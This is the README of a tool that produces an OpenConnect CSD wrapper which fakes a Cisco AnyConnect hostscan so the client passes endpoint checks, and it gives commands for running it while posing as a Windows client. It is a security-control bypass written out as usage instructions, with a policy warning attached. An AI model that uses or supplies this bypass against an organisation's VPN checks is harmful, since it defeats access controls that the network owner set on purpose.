Generate OpenConnect CSD files to bypass Cisco AnyConnect hostscan requirements
Generate an OpenConnect Cisco Secure Desktop (CSD) file that bypasses AnyConnect hostscan requirements.
This script parses an AnyConnect client connection and outputs a CSD file that can be used with OpenConnect. The CSD file will perform a POST request to the AnyConnect server, giving the illusion a hostscan took place. Even if the AnyConnect server does not publish binaries for your Operating System (OS), you will still be able to connect. This is due to the fact that OpenConnect allows you to specify which OS you are connecting from. This means you can be on a Linux box and pretend to be a Windows client!
WARNING: Doing this will bypass the checks hostscan performs. This may be against your company's policy. By using this script and the resulting CSD file, you are using these files at your own risk. This script is for educational purposes only.
The hostscan bypass was originally coded and tested against a Windows machine running AnyConnect. I do not personally have the resources to troubleshoot issues on MacOS. However, @cjbirk did a bit of troubleshooting and successfully generated a CSD file using the bypass on MacOS. Please see this issue for suggestions on troubleshooting any mac related issues.
You can find the associated blog for this tool here.
Note: You will need to install go. That process won't be covered here.
sudo go run hostscan-bypass.go -l -p 443 -r :443 -s
chmod +x hostscan-bypass.sh
sudo openconnect --csd-wrapper=hostscan-bypass.sh --os=win